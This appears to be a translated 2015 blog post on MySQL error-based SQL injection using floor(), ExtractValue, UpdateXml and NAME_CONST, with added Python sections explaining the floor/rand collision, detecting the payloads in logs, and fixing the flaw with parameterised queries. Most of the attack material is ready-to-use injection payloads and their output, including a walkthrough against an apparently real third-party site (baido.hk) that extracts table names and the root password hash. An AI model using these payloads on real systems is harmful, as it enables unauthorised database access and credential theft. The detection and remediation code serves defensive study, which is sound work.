MySQL: three error-based injection methods using floor, ExtractValue and UpdateXml

Posted 2015-11-11 19:03:37

1. Error-based injection via floor()

Payloads such as the following can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

Example:
First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The error message has leaked the MySQL version. To retrieve other data, replace the version() call with another expression.
For example, to retrieve the administrator user name and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
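
Why the floor()/GROUP BY queries above end in ERROR 1062 rather than a result: RAND(0) is a fixed sequence, and MySQL evaluates the GROUP BY key more than once per source row, so the concatenated value eventually collides in the grouping temporary table and the duplicate key error carries it out. The following Python is an added example, not code from the original post. It re-implements MySQL's RAND(seed) generator (the constants are taken from the server's my_rnd() and Item_func_rand as I understand them, which is an assumption) and a simplified model of the grouping step, and shows why at least three rows are needed before the duplicate appears (Method 2 above builds exactly three with its UNION).

```python
# Added example (not from the original post): emulate MySQL's RAND(seed) and a
# simplified model of GROUP BY evaluation to explain the "Duplicate entry ...
# for key 'group_key'" error.  PRNG constants assumed from the server source.
from typing import List, Optional

MAX_VALUE = 0x3FFFFFFF  # modulus used by my_rnd()


class MySQLRand:
    """Reproduces MySQL's RAND(N) sequence for an integer seed N."""

    def __init__(self, seed: int) -> None:
        # Item_func_rand::seed_random(): seed1 = N*0x10001 + 55555555, seed2 = N*0x10000001
        self.seed1 = (seed * 0x10001 + 55555555) & 0xFFFFFFFF
        self.seed2 = (seed * 0x10000001) & 0xFFFFFFFF

    def next(self) -> float:
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand0_sequence(n: int) -> List[int]:
    """First n values of floor(rand(0)*2): always 0,1,1,0,1,1,0,0,... on every call."""
    rng = MySQLRand(0)
    return [int(rng.next() * 2) for _ in range(n)]


def simulate_group_by(row_count: int, prefix: str = "5.1.33-community-log") -> Optional[str]:
    """Simplified model of `SELECT count(*) ... GROUP BY concat(prefix, floor(rand(0)*2))`
    over `row_count` source rows.  MySQL keeps the groups in a temporary table keyed by
    the group value: for each row the key is computed once to look it up, and if it is
    absent the expression is computed AGAIN for the insert.  Because rand(0) advances on
    every evaluation, the inserted key can differ from the looked-up one, and a later
    insert can then collide with it.  Returns the duplicated key (the value that MySQL
    reports in ERROR 1062) or None if no collision happens within `row_count` rows.
    """
    rng = MySQLRand(0)
    temp_table = set()
    for _ in range(row_count):
        lookup_key = prefix + str(int(rng.next() * 2))
        if lookup_key in temp_table:
            continue  # group exists: the aggregate is updated, nothing is inserted
        insert_key = prefix + str(int(rng.next() * 2))  # re-evaluated for the insert
        if insert_key in temp_table:
            return insert_key  # MySQL raises ERROR 1062 Duplicate entry at this point
        temp_table.add(insert_key)
    return None


if __name__ == "__main__":
    print("floor(rand(0)*2):", floor_rand0_sequence(8))
    for rows in (1, 2, 3):
        print(rows, "row(s):", simulate_group_by(rows))
```

With one or two source rows the model returns None (no error, so no leak), which is why the payloads wrap the expression around information_schema.tables or a three-row UNION; with three rows the third row looks up key "...0", finds it absent, and the re-evaluated insert key "...1" already exists. From a defender's point of view the lesson is that the value reaches the attacker only through the error text, so suppressing database error messages in responses closes this channel even where the injection itself remains.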

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
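
All three techniques in this post (and the NAME_CONST variant collected further down) leave two distinct traces: the function names in the request, and a characteristic MySQL error in the application's error output. The following Python is an added example, not code from the original post, showing detection logic for both sides; the access-log and error-log lines are constructed, and the /detail.php endpoint and client addresses are made up.

```python
# Added example (not from the original post): detection logic for the
# error-based injection patterns shown in this thread, run over constructed
# web-server access-log lines and constructed application error-log lines.
import re
from typing import List, Tuple
from urllib.parse import unquote_plus

# Request-side rules, matched on the URL-decoded, lower-cased query string so
# that "+" and %XX encoding of the same payload do not evade them.
REQUEST_RULES: List[Tuple[str, re.Pattern]] = [
    ("floor-rand",   re.compile(r"floor\s*\(\s*rand\s*\(")),
    ("extractvalue", re.compile(r"\bextractvalue\s*\(")),
    ("updatexml",    re.compile(r"\bupdatexml\s*\(")),
    ("name_const",   re.compile(r"\bname_const\s*\(")),
]

# Error-side rules: the MySQL messages that carry the leaked value.  A hit here
# means verbose database errors are reaching the application layer at all.
ERROR_RULES: List[Tuple[str, re.Pattern]] = [
    ("dup-group-key", re.compile(r"ERROR 1062\b.*Duplicate entry .* for key \W?group_key")),
    ("xpath-error",   re.compile(r"ERROR 1105\b.*XPATH syntax error")),
    ("dup-column",    re.compile(r"Duplicate column name")),
]

# Constructed sample lines (common log format).  The payloads are the ones
# quoted in the post, applied to a made-up /detail.php endpoint.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [11/Nov/2015:19:03:37 +0800] "GET /detail.php?id=330 HTTP/1.1" 200 512',
    '203.0.113.7 - - [11/Nov/2015:19:04:01 +0800] "GET /detail.php?id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 88',
    '203.0.113.7 - - [11/Nov/2015:19:04:09 +0800] "GET /detail.php?id=1+and+extractvalue(1,concat(0x5c,version())) HTTP/1.1" 500 88',
    '203.0.113.7 - - [11/Nov/2015:19:04:15 +0800] "GET /detail.php?id=1%20and%201=(updatexml(1,concat(0x3a,user()),1)) HTTP/1.1" 500 88',
    '203.0.113.9 - - [11/Nov/2015:19:05:12 +0800] "GET /detail.php?id=1+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 88',
]

SAMPLE_ERROR_LOG = [
    "ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'",
    "ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'",
    "Error: Duplicate column name '5.0.27-community-nt'",
    "ERROR 1146 (42S02): Table 'app.missing' doesn't exist",  # ordinary error, not a probe
]

ACCESS_LINE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')


def classify_request(url: str) -> List[str]:
    """Labels of every request rule that matches the URL's query string."""
    query = url.split("?", 1)[1] if "?" in url else ""
    decoded = unquote_plus(query).lower()
    return [label for label, pat in REQUEST_RULES if pat.search(decoded)]


def classify_error(line: str) -> List[str]:
    """Labels of every error rule that matches one error-log line."""
    return [label for label, pat in ERROR_RULES if pat.search(line)]


def scan_access_log(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """(client_ip, labels) for each access-log line whose request matches a rule."""
    hits = []
    for line in lines:
        m = ACCESS_LINE.match(line)
        if m:
            labels = classify_request(m.group(2))
            if labels:
                hits.append((m.group(1), labels))
    return hits


def scan_error_log(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """(line, labels) for each error-log line that looks like a probe response."""
    return [(line, classify_error(line)) for line in lines if classify_error(line)]


if __name__ == "__main__":
    for ip, labels in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{ip}: {', '.join(labels)}")
    for line, labels in scan_error_log(SAMPLE_ERROR_LOG):
        print(f"{labels}: {line}")
```

Matching on the decoded query string matters because the same payload appears here once with "+" for spaces and once with %20; matching the raw request line would need a separate pattern for every encoding. Correlating a request hit with an error-side hit for the same time window is the strongest signal that the probe actually reached the database and that error text is being exposed.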

Additional material collected:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: using NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|---------------|
|     TEST      |
|---------------|
|       1       |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

4 N. L" i! G: m( X. ]' v
Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here, if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'


Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
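
Every technique in this thread needs two things from the application: an id value that is pasted into the SQL text, and a database error message that is echoed back to the client (Duplicate entry, XPATH syntax error, Duplicate column name). The following Python is an added example, not code from the original post, showing the two controls that remove those preconditions: binding the id as a query parameter, and returning a generic message instead of the DBMS error. The article table and its rows mirror the post's example but are constructed, sqlite3 stands in for MySQL so the code runs offline, and for that reason the injected probes used for contrast are generic ones rather than the MySQL-specific payloads above.

```python
# Added example (not from the original post): parameterised queries plus
# generic error responses, the two controls that defeat error-based injection.
# Uses sqlite3 in memory; table, rows and inputs are constructed.
import sqlite3
from typing import Callable, List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the post's `article` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER, title TEXT, content TEXT)")
    conn.executemany("INSERT INTO article VALUES (?, ?, ?)",
                     [(1, "test", "do it"), (2, "second", "more")])
    return conn


def fetch_article_vulnerable(conn: sqlite3.Connection, user_id: str) -> List[Tuple]:
    """String concatenation: the input becomes part of the SQL text and is parsed
    as SQL, which is the defect every payload in this thread relies on."""
    return conn.execute("SELECT * FROM article WHERE id = " + user_id).fetchall()


def fetch_article_safe(conn: sqlite3.Connection, user_id: str) -> List[Tuple]:
    """Parameterised query: the input is bound as a value and never parsed as SQL.
    A value such as "1 or 1=1" is simply compared against the id column as text."""
    return conn.execute("SELECT * FROM article WHERE id = ?", (user_id,)).fetchall()


def handle_request(conn: sqlite3.Connection, user_id: str,
                   fetch: Callable = fetch_article_safe) -> Tuple[int, str]:
    """Second control: never echo database error text to the client.  The leak in
    error-based injection is the DBMS message itself, so it is logged server-side
    (a real handler would call the logger here) and the client gets a fixed string."""
    try:
        rows = fetch(conn, user_id)
    except sqlite3.Error:
        return 500, "internal error"
    if not rows:
        return 404, "not found"
    return 200, str(rows[0])


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, probe input :", fetch_article_vulnerable(db, "1 or 1=1"))
    print("parameterised, same    :", fetch_article_safe(db, "1 or 1=1"))
    print("parameterised, id=1    :", fetch_article_safe(db, "1"))
    print("error hidden           :", handle_request(db, "1 and extractvalue(1,'x')", fetch_article_vulnerable))
```

The vulnerable builder returns both rows for the probe input because the condition was rewritten; the parameterised query returns nothing, because the whole string is compared as a value. The last call shows the response-side control on its own: even with the vulnerable builder, the client sees only "internal error" rather than the database's own text, which is the message these techniques depend on.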
